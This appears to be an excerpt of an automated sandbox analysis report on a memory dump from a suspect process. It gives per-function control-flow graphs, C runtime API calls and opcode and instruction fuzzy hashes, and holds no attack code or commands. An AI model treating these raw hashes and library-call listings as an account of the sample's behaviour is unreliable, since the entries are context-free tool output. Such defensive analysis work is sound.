                                                                                                                                                                                                                                        control_flow_graph 595 2893f16-2893f2f 596 2893f49-2893f5e call 289bdc0 595->596 597 2893f31-2893f3b call 2895ba8 call 2894c72 595->597 596->597 603 2893f60-2893f63 596->603 604 2893f40 597->604 605 2893f65 603->605 606 2893f77-2893f7d 603->606 607 2893f42-2893f48 604->607 608 2893f6b-2893f75 call 2895ba8 605->608 609 2893f67-2893f69 605->609 610 2893f89-2893f9a call 28a0504 call 28a01a3 606->610 611 2893f7f 606->611 608->604 609->606 609->608 619 2893fa0-2893fac call 28a01cd 610->619 620 2894185-289418f call 2894c9d 610->620 611->608 614 2893f81-2893f87 611->614 614->608 614->610 619->620 625 2893fb2-2893fbe call 28a01f7 619->625 625->620 628 2893fc4-2893fcb 625->628 629 289403b-2894046 call 28a02d9 628->629 630 2893fcd 628->630 629->607 636 289404c-289404f 629->636 632 2893fcf-2893fd5 630->632 633 2893fd7-2893ff3 call 28a02d9 630->633 632->629 632->633 633->607 638 2893ff9-2893ffc 633->638 639 289407e-289408b 636->639 640 2894051-289405a call 28a0554 636->640 641 289413e-2894140 638->641 642 2894002-289400b call 28a0554 638->642 643 289408d-289409c call 28a0f40 639->643 640->639 650 289405c-289407c 640->650 641->607 642->641 651 2894011-2894029 call 28a02d9 642->651 652 28940a9-28940d0 call 28a0e90 call 28a0f40 643->652 653 289409e-28940a6 643->653 650->643 651->607 658 289402f-2894036 651->658 661 28940de-2894105 call 28a0e90 call 28a0f40 652->661 662 28940d2-28940db 652->662 653->652 658->641 667 2894113-2894122 call 28a0e90 661->667 668 2894107-2894110 661->668 662->661 671 289414f-2894168 667->671 672 2894124 667->672 668->667 675 289413b 671->675 676 289416a-2894183 671->676 673 289412a-2894138 672->673 674 2894126-2894128 672->674 673->675 674->673 677 2894145-2894147 674->677 675->641 676->641 677->641 678 2894149 677->678 678->671 679 289414b-289414d 678->679 679->641 679->671
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _memset.LIBCMT ref: 02893F51
                                                                                                                                                                                                                                          • Part of subcall function 02895BA8: __getptd_noexit.LIBCMT ref: 02895BA8
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 02893FEA
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 02894020
                                                                                                                                                                                                                                        • __gmtime64_s.LIBCMT ref: 0289403D
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 02894093
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 028940AF
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 028940C6
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 028940E4
                                                                                                                                                                                                                                        • __allrem.LIBCMT ref: 028940FB
                                                                                                                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02894119
                                                                                                                                                                                                                                        • __invoke_watson.LIBCMT ref: 0289418A
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                                                                                                                        • Opcode ID: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                                                        • Instruction ID: a52f569e48cd6b0385b3cea2af678bfb61054e08d90a72eedc1c4ac1a27c1e5c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7fd9d583014fb9bd54c3649c392eeadef0098b2c5eee71df52b0c12f16343c62
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7071E77DA00B16ABEF149E7DCC40B6AB3F9AF10364F184279E518E7680EB70D9418F91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0289650E Relevance: 16.6, APIs: 11, Instructions: 131COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Ex_nolock__lock__updatetlocinfo$___removelocaleref__calloc_crt__copytlocinfo_nolock__invoke_watson_wcscmp
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3432600739-0
                                                                                                                                                                                                                                        • Opcode ID: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                                                                                                        • Instruction ID: 59f3fac2eee7d77ce58e2fc3885cdd2181bbc178962b338d609c11275e216455
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7aa5c98289f18997e9299cf2a82b2e33c44f00e8491ec962a9d4b764f8744340
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF41363E904319AFDF01AFA8DC40B9E3BEAEF44324F18802DE908D6191EB759545DF12
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028984AB Relevance: 16.6, APIs: 11, Instructions: 92COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                        control_flow_graph 744 28984ab-28984d9 call 2898477 749 28984db-28984de 744->749 750 28984f3-289850b call 289158d 744->750 751 28984ed 749->751 752 28984e0-28984eb call 289158d 749->752 756 289850d-289850f 750->756 757 2898524-289855a call 289158d * 3 750->757 751->750 752->749 752->751 759 289851e 756->759 760 2898511-289851c call 289158d 756->760 769 289856b-289857e 757->769 770 289855c-2898562 757->770 759->757 760->756 760->759 775 289858d-2898594 769->775 776 2898580-2898587 call 289158d 769->776 770->769 771 2898564-289856a call 289158d 770->771 771->769 778 28985a3-28985ae 775->778 779 2898596-289859d call 289158d 775->779 776->775 782 28985cb-28985cd 778->782 783 28985b0-28985bc 778->783 779->778 783->782 785 28985be-28985c5 call 289158d 783->785 785->782
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free$ExitProcess___crt
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1022109855-0
                                                                                                                                                                                                                                        • Opcode ID: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                                                        • Instruction ID: 0827208d640255e701aaae51b0d4ea6edb559b3449b2696f87b9d93134fe11f9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 351ddd14b24f1e3a4d385d89d907221036510e379468225c84414e37ce72688f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2331E53D900252DFCF215F18FC8484977A6FB1632430D866AE91DD72B0CBB459C8AF91
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028BFC0C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFC1F
                                                                                                                                                                                                                                          • Part of subcall function 028A169C: std::exception::_Copy_str.LIBCMT ref: 028A16B5
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC34
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFC4D
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC62
                                                                                                                                                                                                                                        • std::regex_error::regex_error.LIBCPMT ref: 028BFC74
                                                                                                                                                                                                                                          • Part of subcall function 028BF914: std::exception::exception.LIBCMT ref: 028BF92E
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC82
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFC9B
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFCB0
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throwstd::exception::exception$Copy_strstd::exception::_std::regex_error::regex_error
                                                                                                                                                                                                                                        • String ID: leM
                                                                                                                                                                                                                                        • API String ID: 3569886845-2926266777
                                                                                                                                                                                                                                        • Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                                                        • Instruction ID: 8f1cfdad14c02755525b698a89a28c3dbe909e9a5709fd0ea9c2c21f7a4876f3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0011BC7DC0020DBBCF00FFA9D869CDEBB7DAA04344F408566AD2897641EB74A3488F95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287F010 Relevance: 15.1, APIs: 10, Instructions: 78COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _free_malloc_wprintf$_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3721157643-0
                                                                                                                                                                                                                                        • Opcode ID: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                                                        • Instruction ID: 9ba123abdf7040d210661453053c40f95679e40c1fc7600bac7e179da5ac9fd3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 02ca39b803bb7accc6b95a63f2f9baed07ed6e7a95ba34453850edf5138b640f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B61127BE9045503ACA61B3BA0C15EFF3ADD9F45701F0C00A9FF5DE1180DB189A049BB2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02881960 Relevance: 13.6, APIs: 9, Instructions: 149COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_memset$_malloc_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 65388428-0
                                                                                                                                                                                                                                        • Opcode ID: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                                                        • Instruction ID: 6f7b1195b1c9e72fd743cf9a6dc1dc9c9513c04aa5d3aeec90c6f53bf8cc5e93
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 76dd775f958ae6873f0575faef2ecf56324248e316e82f6433bbffcf9f7903c6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AC515D79D40209ABDB11EBA5DC89FEFBBB9FF04744F140025F919F6180EB746A018BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287F210 Relevance: 10.7, APIs: 7, Instructions: 165COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                                                                                                                        • Opcode ID: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                                                        • Instruction ID: 98faa5071a5634663cf3f73ecdc789ef1f774b6319b960c02451ac57c18b6497
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3deed8c6e3840860115ea43936f1cfce13c92bcc70370307f91e5f5c9cd17acd
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F51B0B9D40209ABEF10DFA5DC46FEEBBB8EB14704F140025FA05F6180E774AA058BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287F440 Relevance: 10.7, APIs: 7, Instructions: 159COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Exception@8Throw$_memset_sprintf
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 217217746-0
                                                                                                                                                                                                                                        • Opcode ID: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                                                        • Instruction ID: 6fd8baa8b32251759ff68e88edfef2c1a518b2db946e1871f61ba7bac6293769
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16aaa772ddb988d461e4337924cf716956fc1cb963719ed600faa1ffd715582e
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 21518F79D40209ABDF21DFA5DC45FEEBBB8FB04704F140029EA15F6180EB74AA058BA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028B208B Relevance: 9.1, APIs: 6, Instructions: 112COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__invoke_watson__lock_strlen_strnlen
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 3534693527-0
                                                                                                                                                                                                                                        • Opcode ID: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                                                                                                        • Instruction ID: f3687dc0d93d2bc51afd8cabf3763ae673702e15127c302aa4dd6949bf82d100
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b5cd30b09028c4688c7add7ba7a2b705b2aa5fc65eb7c357d53e3922a347f5d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7131FC7E9002156FDF237B6C9C007DE37959F05B28F144419ED18EB388DB749542CBA2
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 029366D9 Relevance: 9.1, APIs: 6, Instructions: 100COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • __getptd_noexit.LIBCMT ref: 029366DD
                                                                                                                                                                                                                                          • Part of subcall function 028959BF: __calloc_crt.LIBCMT ref: 028959E2
                                                                                                                                                                                                                                          • Part of subcall function 028959BF: __initptd.LIBCMT ref: 02895A04
                                                                                                                                                                                                                                        • __calloc_crt.LIBCMT ref: 02936700
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 0293671E
                                                                                                                                                                                                                                        • __invoke_watson.LIBCMT ref: 0293673B
                                                                                                                                                                                                                                        • __get_sys_err_msg.LIBCMT ref: 0293676D
                                                                                                                                                                                                                                        • __invoke_watson.LIBCMT ref: 0293678B
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __calloc_crt__get_sys_err_msg__invoke_watson$__getptd_noexit__initptd
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4066021419-0
                                                                                                                                                                                                                                        • Opcode ID: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                                                        • Instruction ID: 15ec4ce903b5d17d7f53f75221e4cb27ef73c0b93c205f9425773ca926a11178
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 560737a3d48f69e2c1bbacaa64e20750b253c0be39bebdd764001766347183bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BF11C17A6017147BEB236B299C00BAB73DDDF407A5F840426FE09E6240E735D9018AEA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02882670 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 382COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: D
                                                                                                                                                                                                                                        • API String ID: 2102423945-2746444292
                                                                                                                                                                                                                                        • Opcode ID: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                                                        • Instruction ID: 86e8b9bc8f92fce00e2fd2d2a13ad0e32fb16e0a016e7d8e631588ce961b62f2
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: dedb8dcdcede06716d2048126f6c935cbca30f7ec4e51b62ea2b6cedae773fd8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 75E17C79D00259EBCF24EBA4CD49FEEB7B8BF04304F0440A9E909E6194EB746A45CF54
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287D8B0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: $$$(
                                                                                                                                                                                                                                        • API String ID: 2102423945-3551151888
                                                                                                                                                                                                                                        • Opcode ID: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                                                        • Instruction ID: 70157bff53ef46036713fab82ad3f71f98238707a69720989fa2f2bd5ed0c639
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d910fc5c6766dfc0bc4f58c39da0494fd508bff05af182706436a08bc08c5056
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BD91C179D00218ABEF20DFA4CC45BEDBBB5AF05308F144069D409B72C1DBB65A48CF65
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 02895CE1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91COMMONLIBRARYCODE
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _wcsnlen
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 3628947076-3372436214
                                                                                                                                                                                                                                        • Opcode ID: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                                                        • Instruction ID: bdf8275e58cbd6283415d46f6afd0452f4d7c6253c8ba69769a8cc4cbea47f49
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ddbdfe4e8834e254b395da421ec3c28ac3be050359a4b81b0499ab3bd56dfaa9
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3321083E20420CAEEF019AA8EC45BBE739DDB45664F984175E908C6590FB74EA408AA5
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0288A810 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _memset
                                                                                                                                                                                                                                        • String ID: p2Q
                                                                                                                                                                                                                                        • API String ID: 2102423945-1521255505
                                                                                                                                                                                                                                        • Opcode ID: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction ID: 2a22ea83dc14412602307bfd0c0f923a60ad3e0f0e0f7e794d4251d9a80731d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 46ecb9121aab2c4594d1f343841fc1340943ec8095ce101e3444a0aa36bfb78c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B7F0C97C698750A5FB21B758BC26B857E916B31F48F144088E1182A2E1D2F9378CA7DA
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 028BFBDE Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • std::exception::exception.LIBCMT ref: 028BFBF1
                                                                                                                                                                                                                                          • Part of subcall function 028A169C: std::exception::_Copy_str.LIBCMT ref: 028A16B5
                                                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 028BFC06
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Copy_strException@8Throwstd::exception::_std::exception::exception
                                                                                                                                                                                                                                        • String ID: TeM$TeM
                                                                                                                                                                                                                                        • API String ID: 3662862379-3870166017
                                                                                                                                                                                                                                        • Opcode ID: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                                                        • Instruction ID: 610ecf187f0c9bfa140db7bb4933352d8dd48e7e55823a416d9897dae04c8622
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 96199cc15ff6b6db5c9edb5d1ae12cb70dd59b1139974201ea7fd9c915f9b6e6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 91D06779C0020CBBDB00EFA9D459CDDBBB9AA04344F008466A92897241EB74A3498F95
                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                        Function 0287D0E0 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                          • Part of subcall function 0289197D: __wfsopen.LIBCMT ref: 02891988
                                                                                                                                                                                                                                        • _fgetws.LIBCMT ref: 0287D15C
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 0000000B.00000002.2820403987.0000000002870000.00000040.00001000.00020000.00000000.sdmp, Offset: 02870000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_11_2_2870000_DB15.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: __wfsopen_fgetws
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 853134316-0
                                                                                                                                                                                                                                        • Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
                                                                                                                                                                                                                                        • Instruction ID: 0387e5a43fda64dec3a14e3ce145250e75bcadc6f0325eee233d18730550d5bb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
